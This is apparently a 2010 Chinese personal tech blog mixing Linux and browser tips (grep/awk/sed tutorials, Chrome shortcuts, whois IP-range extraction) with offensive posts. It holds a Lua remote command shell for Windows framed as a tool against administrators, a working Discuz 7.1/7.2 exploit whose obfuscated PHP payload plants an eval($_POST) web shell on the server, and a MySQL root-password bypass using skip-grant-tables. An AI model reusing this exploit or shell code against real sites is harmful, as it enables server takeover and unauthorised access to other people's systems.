2010年2月25日星期四

tian6 复活

数据貌似 完整
今天GOOGLES资料 发现的

貌似刚开始 

TC V5 

--
JUST BEGINING NOW
发帖者 时间: 没有评论:

2010年2月21日星期日

lua cmdshell for windows (just simple fuking:>)

server.lua
--[[
ver:Lua 5.1.4 
creater:winger
A demo abou cmdshell for windows with lua
very simple 
i will do more stronge fucking tool to fucking stupid Admin(MS$ i like your ass)
fucking gfw just for our free
]]
require('socket')

host = "*"
port = 7777
if arg then
host = arg[1] or host
port = arg[2] or port
end
print ("host")
print("Binding to host '" ..host.. "' and port " ..port.. "...")
s1 = assert(socket.bind(host, port))

i, p = s1:getsockname()
assert(i, p)
print("Waiting connection from Tel on " .. i .. ":" .. p .. "...")
while true do
c1 = s1:accept()
print("Connected. Here is the  stuff:")
--c1:settimeout(5)
i,p = c1:receive('*l')

cmdlog =os.tmpname()

 while true  do
if i then
    print(i)

--local cmdlog = io.tmpfile()
os.execute("cmd/c  "..i..">"..cmdlog)
print(cmdlog)

if i == "ds" then   os.remove(cmdlog)  print ("God Fucking Die") os.exit() end
if i == "dc" then break print ("Winger Flying Away") end
for line in io.lines(cmdlog) do assert(c1:send(line.."\r\n")) print (line)  end

--print("good send 1 ")
    i, e , m= c1:receive('*l')
if  i then print ("receive---"..i) else print (e) break end
end
  end

c1:close()
end
os.remove(cmdlog)


client.lua
--[[
ver:Lua 5.1.4 
creater:winger
A demo abou cmdshell for windows with lua
very simple 
i will do more stronge fucking tool to fucking stupid Admin(MS$ i like your ass)
fucking gfw just for our free
]]
local sock = require('socket')
host = host or "localhost"
port = port or 7777
if arg then
host = arg[1] or host
port = arg[2] or port
end
print("Attempting connection to host '" ..host.. "' and port " ..port.. "...")
client = assert(socket.connect(host, port))
print("Connected! Please type stuff ('dc' to drop winger 'ds' to drop god):")
client:settimeout(1)
cmd = io.read()
while  cmd  and cmd ~= "dc" do

assert(client:send(cmd.."\n"))

s,status,partial = client:receive("*a")
print (s  or partial )

cmd = io.read()

        if status == "closed" then print(status) break end

end

assert(client:send("dc"))

client:close()


--
JUST BEGINING NOW
发帖者 时间: 没有评论:

2010年2月19日星期五

online resource for beginners to learn TKinter for python

http://wiki.python.org/moin/TkInter (many more)

http://www.pythonware.com/library/index.htmhttp://www.ferg.org/thinking_in_tkinter/index.html 

You can download it also look online

TkInter is simple and beautiful

coding, good luck


中文的 


answere ten question everyday to improve my poor English

发帖者 时间: 没有评论:

2010年2月18日星期四

非常好的chrome 翻译 扩展


非常好的chrome 翻译插件 中文的
推荐大家用啊 

--
JUST BEGINING NOW
发帖者 时间: 没有评论:

linux安全维护视频

下载地址是http://down.ixpub.net/safe/donghua/linux/linux1.rar 
一直到linux13.rar 
第一课 linux简单介绍与安装
第二课 linux下的重要工具yum详解 
第三课 关闭不需要的端口
第四课 linux物理安全 
第五课 linux网络安全之信息收集 
第六课 linux网络安全之端口扫描
第七课 安装配置入侵检测系统
第八课 linux日志分析 
第九课 linux服务器安全之文件策略
第十课 linux服务器安全之pam模块 
第十一课 linux服务器安全之ssh安全配置 
第十二课 Linux服务器之web安全篇 
第十三课 linux服务器安全之DNS配置

--
JUST BEGINING NOW
发帖者 时间: 没有评论:

本地无root权限万能改MYSQL密码法


 本地无root权限万能改MYSQL密码法

 
打开CMD首先停止mysql服务
net stop mysql
进入mysql安装目录下的bin文件夹,然后输入
  1. mysqld-nt --skip-grant-tables
复制代码
跳过密码检测
然后另外新打开一个cmd窗口
输入mysql 直接回车可以以root权限进入mysql
  1. use mysql
  2. update user set password=password("新密码") where user="root";
  3. flush privileges;
复制代码

如果无错误提示,密码即可更改成功。
--
JUST BEGINING NOW
发帖者 时间: 没有评论:

2010年2月16日星期二

winger free wants to share their location with you on Google Latitude

winger free (free.winger@gmail.com) wants to start sharing their location with you on Google Latitude. You too can share your location with your friends with Latitude using your mobile phone, computer, or both.

Aww snap. You don't have a Google Account.

To use Google Latitude, you'll need to sign in with a Google Account. If you don't have one, use the following steps:

1. Create a new Gmail account at https://mail.google.com/mail/signup or create a Google Account for your existing email address at https://www.google.com/accounts/NewAccount

2. Get Latitude on your phone by going to http://m.google.com/latitude?dc=lati in your phone's web browser. Don't have a supported phone? Go to that page from your computer to use Latitude in iGoogle.

3. Open Latitude and add winger free (free.winger@gmail.com) as a friend!

Learn more about Latitude
Go to http://www.google.com/latitude

(c) 2009 Google Inc., 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA. Terms of Service | Privacy Policy

发帖者 时间: 没有评论:

2010年2月15日星期一

stardict 星际译王 字典加载

stardict 星际译王 字典加载

解压到这个目录下
sudo tar -xvjf stardict-babylon-oxford-encn-2.4.2.tar.bz2 -C /usr/share/stardict/dic/


http://hi.baidu.com/talltwintowers/blog/item/298a601617d36456f3de32a0.html
发帖者 时间: 没有评论:

opera 后台打开新标签


草阿
打死也没想到是设置这个
感谢 互联网 感谢ccav 感谢 祖国大好河山
在后台打开新窗口:
(1)在首选项-常规-弹出窗口那里设置“在后台打开弹出窗口”。

http://tieba.baidu.com/f?kz=133620239

另一个方法

(2)在地址栏输入opera:config进入Opera设置,选择上“Ignore Unrequested Popups”,点击保存。
发帖者 时间: 没有评论:

ubuntu apt-get 批量 安装

cat 1.txt>xargs sudo aptitude install -y
sudo apt-cache search  ^lua|awk '{printf $1" "}'|xargs sudo aptitude install -y

批量安装 软件

thanks:<jimmyxu>


发帖者 时间: 没有评论:

2010年2月13日星期六

轻松获得网通、电信、铁通IP地址分配段 whois3 awk grep

轻松获得网通、电信、铁通IP地址分配段
2009年03月30日 星期一 12:20

APNIC是管理亚太地区IP地址分配的机构,它有着丰富准确的IP地址分配库,同时这些信息也是对外公开的!下面就让我们看看如何在Linux下获得一些电信运营商的IP地址分配情况:

shell> wget http://ftp.apnic.net/apnic/dbase/tools/ripe-dbase-client-v3.tar.gz

shell> tar xzvf ripe-dbase-client-v3.tar.gz
shell> cd whois-3.1
shell> ./configure
shell> make
完成上述编译安装工作后,我们开始获取IP地址段;

中国网通:
shell> ./whois3 -h whois.apnic.net -l -i mb MAINT-CNCGROUP > /var/cnc

中国电信:
shell> ./whois3 -h whois.apnic.net -l -i mb MAINT-CHINANET > /var/chinanet

中国铁通:
shell> ./whois3 -h whois.apnic.net -l -i mb MAINT-CN-CRTC > /var/crtc

打开获取后的文件可以看到里面的信息非常详细,甚至可以看到各个分公司的负责人、电话、电子邮件等等信息。如果想得到一份整齐干净的IP地址段文件,只要用grep和awk简单过滤就可以了:)


结果如下(只列出一条):
[root@localhost whois-3.1]# ./whois3 -h whois.apnic.net -l -i mb MAINT-CN-XYD
inetnum:            124.173.120.0 - 124.173.120.255
netname:            jwb-3-120
descr:              customer 3-120 of jwb
country:            CN
admin-c:            PL19-CN
tech-c:             PL19-CN
mnt-by:             MAINT-CN-XYD
changed:      pat#gzidc.com 20061011
status:             assigned non-portable
source:             CNNIC

获取中国CNC网通地址列表字段

./whois3 -h whois.apnic.net -l -i mb MAINT-CNCGROUP | grep “descr” | grep “Reverse” | awk -F “for” ‘{if ($2!=”") print $2}’| sort -n | awk ‘BEGIN{print “acl \”CNC\” ‘{’”}{print $1″;”}END{print “‘}’;”}’ > /var/named/cnc_acl.conf


获取中国电信CTC 地址列表字段

./whois3 -h whois.apnic.net -l -i mb MAINT-CHINANET | grep “descr” | grep “Reverse” | awk -F “for” ‘{if ($2!=”") print $2}’| sort -n | awk ‘BEGIN{print “acl \”CTC\” ‘{’”}{print $1″;”}END{print “‘}’;”}’ > /var/named/ctc_acl.conf
结果部分如下:
acl “CTC” {
222.85.94.0/24;
222.85.95.0/24;
222.85.96.0/24;
222.85.97.0/24;
222.85.98.0/24;
222.85.99.0/24;
222.88.0.0/16;
222.89.0.0/16;
};

Grep的常用命令语法

1. 双引号引用和单引号引用
在g r e p命令中输入字符串参数时,最好将其用双引号括起来。例如:“m y s t r i n g”。这样做有两个原因,一是以防被误解为 s h e l l命令,二是可以用来查找多个单词组成的字符串,例如:“jet plane”,如果不用双引号将其括起来,那么单词 p l a n e将被误认为是一个文件,查询结果将返回“文件不存在”的错误信息。
在调用变量时,也应该使用双引号,诸如: g r e p“$ M Y VA R”文件名,如果不这样,将
没有返回结果。
在调用模式匹配时,应使用单引号.[root@mypc ]# echo `grep 123 111.txt`   (#注意是反单引号)

2. 常用的g r e p选项有:
-c 只输出匹配行的计数。
-i 不区分大小写(只适用于单字符)。
-h 查询多文件时不显示文件名。
-l 查询多文件时只输出包含匹配字符的文件名。
-n 显示匹配行及行号。
-s 不显示不存在或无匹配文本的错误信息。
-v 显示不包含匹配文本的所有行。

3. 特殊的——在多个文件中进行查询
$ grep "sort"*.doc     ( #在当前目录下所有. d o c文件中查找字符串“s o r t”)

$ grep "sort it" *    (#或在所有文件中查询单词“sort it”)


接下来的所有示例是指在单个文件中进行查询
4. 行匹配
$ grep -c "48" data.f
$ 4                   (#g r e p返回数字4,意义是有4行包含字符串“4 8”。)
$ grep "48" data.f       (#显示包含“4 8”字符串的4行文本)

5. 显示满足匹配模式的所有行行数:
[root@mypc oid2000]# grep -n 1234 111.txt
1:1234
3:1234ab

6. 精确匹配
[root@mypc oid2000]# grep "1234\>" 111.txt
1234

7. 查询空行,查询以某个条件开头或者结尾的行。
结合使用^和$可查询空行。使用- n参数显示实际行数
[root@mypc oid2000]# grep -n "^$" 111.txt (返回结果 2: #说明第二行是空行)
[root@mypc oid2000]# grep -n "^abc" 111.txt (#查询以abc开头的行)
[root@mypc oid2000]# grep -n "abc$" 111.txt   (#查询以abc结尾的行)

8. 匹配特殊字符,查询有特殊含义的字符,诸如$ . ' " * [] ^ | \ + ? ,必须在特定字符前加\。
[root@mypc oid2000]# grep   "\." 111.txt   (#在111.txt中查询包含“.”的所有行)
[root@mypc oid2000]# grep   "my\.conf"   111.txt (#查询有文件名my. c o n f的行)

9. 目录的查询
[root@mypc oid2000]# ls –l |grep “^d”    (#如果要查询目录列表中的目录)
[root@mypc oid2000]# ls –l |grep “^d[d]” (#在一个目录中查询不包含目录的所有文件)
[root@mypc]# ls –l |grpe “^d…..x..x” (#查询其他用户和用户组成员有可执行权限的目录集合)

10.排除自身

ps -ef|grep telnet | grep -v grep (在显示的进程中抽出“telnet”进程;并丢弃ps中的grep进程)


Awk的常用命令语法

awk命令擅长格式化报文或从一个大的文本文件中抽取数据包,下面是该命令的基本语法
awk [-F filed-separator] “commands” input-file(s)
[ - F域分隔符]是可选的,a w k使用空格作为缺省的域分隔符,如果在要处理的文件中是以冒号作为分割域的(如passwd文件),则在处理的时候要这样指明 awk –F: command input-file(s)

1.1域和记录
a w k执行时,其浏览域标记为$ 1,$ 2 . . . $ n。这种方法称为域标识。使用$ 1 , $ 3表示参照第1和第3域,注意这里用逗号做域分隔。如果希望打印一个有 5个域的记录的所有域,不必指明 $ 1 , $ 2 , $ 3 , $ 4 , $ 5,可使用$ 0,意即所有域。

1.2保存a w k输出
$ awk ‘{print $0}’ input-files > out-files (#重定向保存输出)
$ awk ‘{print $0}’ input-files | tee out-files   (#使用t e e命令,输出到文件的同时输出到屏幕)

1.3 常用的awk命令举例
[root@mypc /]# awk '$0 ~ /user/' /etc/passwd   (#如果某域含有user就将该行打印出来)
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
[root@mypc /]# awk '/user/' /etc/passwd    (#同上)
[root@mypc /]# awk -F: '{if ($5 ~ /user/) print $0}' /etc/passwd (#如第五域有user则输出该行)
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
[root@mypc /]# ifconfig | awk '/inet/{print $2}'   (#从ifconfig的输出中抽取含inet的行并打印第二域)
[root@mypc /]# ifconfig | awk '/inet/{print $2}' | awk -F: '{print $2}' (#在上面的基础上再抽取,这个命令可以让你直接得到本机的ip地址)



Sed的常用命令语法
Sed是一个非交互性文本流编辑器。它编辑文件或标准输入导出的文本拷贝。

1.行的匹配
[root@mypc /]# sed -n '2p' /etc/passwd   打印出第2行
[root@mypc /]# sed -n '1,3p' /etc/passwd 打印出第1到第3行
[root@mypc /]# sed -n '$p' /etc/passwd 打印出最后一行
[root@mypc /]# sed -n '/user/'p /etc/passwd 打印出含有user的行
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
[root@mypc /]# sed -n '/\$/'p /etc/passwd   打印出含有$元字符的行,$意为最后一行

2.插入文本和附加文本(插入新行)
[root@mypc /]# sed -n '/FTP/p' /etc/passwd   打印出有FTP的行
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
[root@mypc /]# sed '/FTP/ a\ 456' /etc/passwd 在含有FTP的行后面新插入一行,内容为456
[root@mypc /]# sed '/FTP/ i\ 123' /etc/passwd在含有FTP的行前面新插入一行,内容为123
[root@mypc /]# sed '/FTP/ i\ "123"' /etc/passwd在含有FTP的行前面新插入一行,内容为"123"
[root@mypc /]# sed '5 a\ 123' /etc/passwd       在第5行后插入一新行,内容为123
[root@mypc /]# sed '5 i\ “12345”' /etc/passwd 在第5行前插入一新行,内容为“12345”

3.删除文本
[root@mypc /]# sed '1d' /etc/passwd   删除第1行
[root@mypc /]# sed '1,3d' /etc/passwd   删除第1至3行
[root@mypc /]# sed '/user/d' /etc/passwd   删除带有user的行

4. 替换文本,替换命令用替换模式替换指定模式,格式为:
[ a d d r e s s [,address]] s/ pattern-to-find /replacement-pattern/[g p w n]
[root@mypc /]# sed 's/user/USER/' /etc/passwd     将第1个user替换成USER,g表明全局替换
[root@mypc /]# sed 's/user/USER/g' /etc/passwd 将所有user替换成USER
[root@mypc /]# sed 's/user/#user/' /etc/passwd 将第1个user替换成#user,如用于屏蔽作用
[root@mypc /]# sed 's/user//' /etc/passwd       将第1个user替换成空
[root@mypc /]# sed 's/user/&11111111111111/' /etc/passwd   如果要附加或修改一个很长的字符串,可以使用( &)命令,&命令保存发现模式以便重新调用它,然后把它放在替换字符串里面,这里是把&放前面
[root@mypc /]# sed 's/user/11111111111111&/' /etc/passwd   这里是将&放后面

5. 快速一行命令
下面是一些一行命令集。([ ]表示空格,[ ]表示t a b键)
‘s / \ . $ / / g’ 删除以句点结尾行
‘-e /abcd/d’ 删除包含a b c d的行
‘s / [ ] [ ] [ ] * / [ ] / g’ 删除一个以上空格,用一个空格代替
‘s / ^ [ ] [ ] * / / g’ 删除行首空格
‘s / \ . [ ] [ ] * / [ ] / g’ 删除句点后跟两个或更多空格,代之以一个空格
‘/ ^ $ / d’ 删除空行
‘s / ^ . / / g’ 删除第一个字符
‘s /COL \ ( . . . \ ) / / g’ 删除紧跟C O L的后三个字母
‘s / ^ \ / / / g’ 从路径中删除第一个\
‘s / [ ] / [ ] / / g’ 删除所有空格并用t a b键替代
‘S / ^ [ ] / / g’ 删除行首所有t a b键
‘s / [ ] * / / g’ 删除所有t a b键
如果使用s e d对文件进行过滤,最好将问题分成几步,分步执行,且边执行边测试结果。
经验告诉我们,这是执行一个复杂任务的最有效方式。

http://blog.csdn.net/HanDiShenNiu/archive/2009/03/25/4023385.aspx
http://hi.baidu.com/wylxq/blog/item/17f553dfbd05831b4854037d.html
发帖者 时间: 没有评论:

linux hack 编程 书籍 (c+Python)

就推荐2本比较实用 当然各位应该还有更好的
都吐出来把 哈哈:)



第一本:
Hacking: The Art of Exploitation 2
中文名: 黑客之道:漏洞发掘的艺术 第二版
英文名: Hacking: The Art of Exploitation, 2nd Edition
文字语言: 英文
简介:

第二版包括编程概念、伪代码、控制结构、内存分割、缓冲区溢出、其他部分的溢出、格式字符串、OSI模型、套接字、网络嗅探、拒绝服务、TCP / IP劫持、端口扫描、SHELLCODE、攻防对策、对称加密、密码破解、WEP的攻击等等包含黑客行为的各个方面的内容。本书主要面向广大计算机安全与网络安全爱好者,只要您想精通黑客攻击技术,无论您是想攻击还是想防御,本书都值得您一读。

说明:第二版较之第一版在章节次序上有所变化,将第一版的第二章分开为第二章、第三章,且SHELLCODE单独作为一章。内容上的变动还要大家读后发现。

Index:
HACKING: THE ART OF EXPLOITATION, 2ND EDITION.
ACKNOWLEDGMENTS
PREFACE
Chapter 0x100. INTRODUCTION
Chapter 0x200. PROGRAMMING
Section 0x210. What Is Programming?
Section 0x220. Pseudo-code
Section 0x230. Control Structures
Section 0x240. More Fundamental Programming Concepts
Section 0x250. Getting Your Hands Dirty
Section 0x260. Back to Basics
Section 0x270. Memory Segmentation
Section 0x280. Building on Basics
Chapter 0x300. EXPLOITATION
Section 0x310. Generalized Exploit Techniques
Section 0x320. Buffer Overflows
Section 0x330. Experimenting with BASH
Section 0x340. Overflows in Other Segments
Section 0x350. Format Strings
Chapter 0x400. NETWORKING
Section 0x410. OSI Model
Section 0x420. Sockets
Section 0x430. Peeling Back the Lower Layers
Section 0x440. Network Sniffing
Section 0x450. Denial of Service
Section 0x460. TCP/IP Hijacking
Section 0x470. Port Scanning
Section 0x480. Reach Out and Hack Someone
Chapter 0x500. SHELLCODE
Section 0x510. Assembly vs. C
Section 0x520. The Path to Shellcode
Section 0x530. Shell-Spawning Shellcode
Section 0x540. Port-Binding Shellcode
Section 0x550. Connect-Back Shellcode
Chapter 0x600. COUNTERMEASURES
Section 0x610. Countermeasures That Detect
Section 0x620. System Daemons
Section 0x630. Tools of the Trade
Section 0x640. Log Files
Section 0x650. Overlooking the Obvious
Section 0x660. Advanced Camouflage
Section 0x670. The Whole Infrastructure
Section 0x680. Payload Smuggling
Section 0x690. Buffer Restrictions
Section 0x6a0. Hardening Countermeasures
Section 0x6b0. Nonexecutable Stack
Section 0x6c0. Randomized Stack Space
Chapter 0x700. CRYPTOLOGY
Section 0x710. Information Theory
Section 0x720. Algorithmic Run Time
Section 0x730. Symmetric Encryption
Section 0x740. Asymmetric Encryption
Section 0x750. Hybrid Ciphers
Section 0x760. Password Cracking
Section 0x770. Wireless 802.11b Encryption
Section 0x780. WEP Attacks
Chapter 0x800. CONCLUSION
Section 0x810. References
Section 0x820. Sources
COLOPHON

第二本
GRAY HAT PYTHON BOOK PIC
<<gray hat python>>(灰帽python编程)
文字语言: 英文
主要讲逆向工程.溢出还有木马
简介:
Python is fast becoming the programming language of choice for hackers, reverse engineers, and software testers because it's easy to write quickly, and it has the low-level support and libraries that make hackers happy. But until now, there has been no real manual on how to use Python for a variety of hacking tasks. You had to dig through forum posts and man pages, endlessly tweaking your own code to get everything working. Not anymore. "Gray Hat Python" explains the concepts behind hacking tools and techniques like debuggers, trojans, fuzzers, and emulators. But author Justin Seitz goes beyond theory, showing you how to harness existing Python-based security tools - and how to build your own when the pre-built ones won't cut it. You'll learn how to: Automate tedious reversing and security tasks Design and program your own debugger Learn how to fuzz Windows drivers and create powerful fuzzers from scratch Have fun with code and library injection, soft and hard hooking techniques, and other software trickery Sniff secure traffic out of an encrypted web browser session Use PyDBG, Immunity Debugger, Sulley, IDAPython, PyEMU, and more The world's best hackers are using Python to do their handiwork. Shouldn't you?

打包下载:(书加源码7.8M)
name:GrayhatPython+HackingThe+Art+Of+Exploitation+2e.gz
md5:fed73bba07695147c455f6be4a4648af
url:
http://docs.google.com/uc?id=0B4BO3UZ7wkBzMmJhNmZkZDItYTI4NC00YTA2LTg4M2QtNDJmNzdjZGZkZDY4&export=download&hl=en
http://tinyurl.com/yauykm5  (dropbox备用)
上不了图
我在组里也帖了一份

发帖者 时间: 1 条评论:

2010年2月12日星期五

DZ7.1 7.2exp


2010-01-07 17:27

感谢WJS和冰冷的太阳,老君分析过了,我就不多说了,使用exp的话仅限本机测试,其他用途后果自负!

第一种方法:

先注册个用户然后把

<form method="post" action="   http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">
帖子ID,指定一个存在的帖子即可:<input type="text" name="tid" value="1" />
<input type="hidden" name="action" value="imme_binding" />
<input type="hidden" name="response[result]" value="1:2" />
<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />
<input type="submit" name="topicsubmit" value="提交" class="submit" />
</form>

chr解码后是:value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

里面有个提交地址改下,保存html

打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd

第二种方法:

直接GET,利用语句:

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C


http://hi.baidu.com/hackliuxing/blog/item/1a97a92520fae00a4d088d73.html
发帖者 时间: 没有评论:

2010年2月11日星期四

短地址 tiny url 邪恶出品

http://l.ieooo.com/


发帖者 时间: 没有评论:

Google Chrome帮助 键盘和鼠标快捷键

使用入门: 键盘和鼠标快捷键

打印

键盘和鼠标快捷键是指键盘敲击和鼠标点击的组合,可用于执行特定操作。学会使用下面列出的一些谷歌浏览器快捷键可以节省时间。

Windows 快捷键

标签页和窗口快捷键

Ctrl+N 打开新窗口。
Ctrl+T 打开新标签页。
Ctrl+Shift+N 在隐身模式下打开新窗口。
按 Ctrl+O,然后选择文件。 在谷歌浏览器中打开计算机中的文件。
按住 Ctrl 的同时点击链接。或用鼠标中键(或鼠标滚轮)点击链接。 从后台在新标签页中打开链接。
按住 Ctrl+Shift 的同时点击链接。或按住 Shift 的同时用鼠标中键(或鼠标滚轮)点击链接。 在新标签页中打开链接并切换到刚打开的标签页。
按住 Shift 的同时点击链接。 在新窗口中打开链接。
Ctrl+Shift+T 重新打开上次关闭的标签页。谷歌浏览器可记住最近关闭的 10 个标签页。
将链接拖到标签页中。在标签页中打开链接。
将链接拖到标签栏的空白区域。 在新标签页中打开链接。
将标签页拖出标签栏。在新窗口中打开标签页。
将标签页从标签栏拖到现有窗口中。 在现有窗口中打开标签页。
拖动标签页时按 Esc 将标签页恢复到原先的位置。
Ctrl+1 到 Ctrl+8 切换到标签栏中指定位置编号所对应的标签页。
Ctrl+9 切换到最后一个标签页。
Ctrl+Tab 或 Ctrl+PgDown 切换到下一个标签页。
Ctrl+Shift+Tab 或 Ctrl+PgUp 切换到上一个标签页。
Alt+F4 关闭当前窗口。
Ctrl+W 或 Ctrl+F4 关闭当前标签页或弹出窗口。
用鼠标中键(或鼠标滚轮)点击标签页。 关闭所点击的标签页。
右键点击或者点击并按住浏览器工具栏中的"后退"或"前进"箭头。 在新标签页中显示浏览历史记录。
按 Backspace,或同时按 Alt 和向左箭头键。 转到当前标签页的上一页浏览历史记录。
按 Shift+Backspace,或同时按 Alt 和向右箭头键。 转到当前标签页的下一页浏览历史记录。
按住 Ctrl 的同时点击工具栏中的后退箭头、前进箭头或转到按钮。或用鼠标中键(或鼠标滚轮)点击任一按钮。 从后台在新标签页中打开按钮所对应的目标网页。
双击标签栏的空白区域。最大化窗口。
Alt+Home 在当前窗口打开主页。

谷歌浏览器功能快捷键

Ctrl+B 打开和关闭书签栏。
Ctrl+Shift+B 打开书签管理器。
Ctrl+H 打开"历史记录"页面。
Ctrl+J 打开"下载内容"页面。
Shift+Esc 打开任务管理器。
Shift+Alt+T 将焦点设置在浏览器工具栏上。使用键盘上的向右和向左箭头,可导航至工具栏上的不同按钮。
Ctrl+Shift+J 打开开发人员工具。
Ctrl+Shift+Delete 打开"清除浏览数据"对话框。
F1在新标签页中打开帮助中心(首选方式)。

地址栏快捷键

可在地址栏中使用以下快捷键:

键入搜索字词,然后按 Enter 使用默认搜索引擎进行搜索。
键入搜索引擎关键字,按空格键,然后键入搜索字词,再按 Enter 使用与关键字相关联的搜索引擎进行搜索。
首先键入搜索引擎网址,然后在系统提示时按 Tab,键入搜索字词,再按Enter 使用与网址相关联的搜索引擎进行搜索。
Ctrl+Enter 在地址栏的输入内容前后分别加上 www. 和 .com,并打开得到的网址。
键入网址,然后按 Alt+Enter 在新标签页中打开网址。
F6 或 Ctrl+L 或 Alt+D 突出显示网址。
Ctrl+K 或 Ctrl+E 将"?"中输入"?"。在问号后键入搜索字词可用默认搜索引擎执行搜索。
同时按 Ctrl 和向左箭头键。 在地址栏中将光标移到上一个关键字词
同时按 Ctrl 和向右箭头键。 在地址栏中将光标移到下一个关键字词
Ctrl+Backspace 在地址栏中删除光标前的字词
用键盘上的方向键从地址栏下拉菜单中选择一个条目,然后按Shift+Delete 如有可能,则从浏览历史记录中删除所选条目。
用鼠标中键(或鼠标滚轮)点击地址栏下拉菜单中的一个条目。 从后台在新标签页中打开该条目。
显示地址栏下拉菜单时按 Page Up 或 Page Down选中下拉菜单中的第一个或最后一个条目。

网页快捷键

Ctrl+P 打印当前网页。
Ctrl+S 保存当前网页。
F5 或 Ctrl+R 重新载入当前网页。
Esc 停止载入当前网页。
Ctrl+F 打开查找栏。
Ctrl+G 或 F3 在查找栏中查找下一条与输入内容相匹配的内容。
Ctrl+Shift+GShift+F3 或 Shift+Enter 在查找栏中查找上一条与输入内容相匹配的内容。
点击鼠标中键(或鼠标滚轮)。 激活自动滚动模式。当您移动鼠标时,网页会根据鼠标的移动方向自动滚动。
Ctrl+F5 或 Shift+F5 重新载入当前网页,忽略缓存的内容。
按住 Alt,然后点击链接。 下载链接目标。
Ctrl+U 打开当前网页的源代码。
将链接拖到书签栏中为该链接添加书签。
Ctrl+D 为当前网页添加书签。
F11 在全屏模式下打开网页。再按一次 F11 可退出全屏模式。
Ctrl++,或者按住 Ctrl 并且向上滚动鼠标滚轮。 放大网页上的所有内容。
Ctrl+-,或者按住 Ctrl 并且向下滚动鼠标滚轮。 缩小网页上的所有内容。
Ctrl+0 将网页上的所有内容都恢复到正常大小。
空格键 向下滚动网页。
Home 转至网页顶部。
End 转至网页底部。
按住 Shift 并且滚动鼠标滚轮。 在网页上横向滚动。

文本快捷键

Ctrl+C 将突出显示的内容复制到剪贴板中。
Ctrl+V 或 Shift+Insert 从剪贴板中粘贴内容。
Ctrl+Shift+V 从剪贴板中粘贴内容(不带格式)。
Ctrl+X 或 Shift+Delete删除突出显示的内容并将其复制到剪贴板中。

苹果机快捷键

标签页和窗口快捷键

⌘-N 打开新窗口。
⌘-T 打开新标签页。
⌘-Shift-N 在隐身模式下打开新窗口。
⌘-B 打开和关闭书签栏。
按 ⌘-O,然后选择文件。 在谷歌浏览器中打开计算机中的文件。
按住  的同时点击链接。或用鼠标中键(或鼠标滚轮)点击链接。 从后台在新标签页中打开链接。
按住 ⌘-Shift 的同时点击链接。或按住 Shift 的同时用鼠标中键(或鼠标滚轮)点击链接。 在新标签页中打开链接并切换到刚打开的标签页。
按住 Shift 的同时点击链接。 在新窗口中打开链接。
⌘-Shift-T 重新打开上次关闭的标签页。谷歌浏览器可记住最近关闭的 10 个标签页。
将标签页拖出标签栏。在新窗口中打开标签页。
将标签页从标签栏拖到现有窗口中。 在现有窗口中打开标签页。
Ctrl-Tab 切换到下一个标签页。
Ctrl-Shift-Tab 切换到上一个标签页。
⌘-Q 关闭当前窗口。
⌘-W 关闭当前标签页或弹出窗口。
点击并按住浏览器工具栏中的后退或前进箭头。 在新标签页中显示浏览历史记录。
删除 转到当前标签页的上一页浏览历史记录。
Shift-Delete 转到当前标签页的下一页浏览历史记录。
双击标签栏的空白区域。最大化窗口。

地址栏快捷键

可在地址栏中使用以下快捷键:

键入搜索字词,然后按 Enter 使用默认搜索引擎进行搜索。
键入搜索引擎关键字,按空格键,然后键入搜索字词,再按 Enter 使用与关键字相关联的搜索引擎进行搜索。
首先键入搜索引擎网址,然后在系统提示时按 Tab,键入搜索字词,再按Enter 使用与网址相关联的搜索引擎进行搜索。
Ctrl+Enter 在地址栏的输入内容前后分别加上 www. 和 .com,并打开得到的网址。
键入网址,然后按 ⌘-Enter 在新后台标签页中打开网址。
⌘-L 突出显示网址。
同时按 Ctrl 和向左箭头键。 在地址栏中将光标移到上一个关键字词
同时按 Ctrl 和向右箭头键。 在地址栏中将光标移到下一个关键字词
同时按 Shift-Option 和向左箭头键。 在地址栏中突出显示上一关键字词
同时按 Shift-Option 和向右箭头键。 在地址栏中突出显示下一关键字词
⌘-Delete 在地址栏中删除光标前的字词
在地址栏菜单中按 Page Up 或 Page Down在菜单中选择上一条目或下一条目。

网页快捷键

⌘-P 打印当前网页。
⌘-S 保存当前网页。
⌘-R 重新载入当前网页。
⌘-F 打开查找栏。
⌘-G 在查找栏中查找下一条与输入内容相匹配的内容。
⌘-Shift-G 或 Shift-Enter 在查找栏中查找上一条与输入内容相匹配的内容。
按住 Option,然后点击链接。 下载链接目标。
将链接拖到书签栏中为该链接添加书签。
⌘-D 为当前网页添加书签。
空格键向下滚动网页。

文本快捷键

⌘-C 将突出显示的内容复制到剪贴板中。
⌘-V 从剪贴板中粘贴内容。
⌘-X 或 Shift-Delete删除突出显示的内容并将其复制到剪贴板中。

Linux 快捷键

标签页和窗口快捷键

Ctrl+N 打开新窗口。
Ctrl+T 打开新标签页。
Ctrl+Shift+N 在隐身模式下打开新窗口。
Ctrl+B 打开和关闭书签栏。
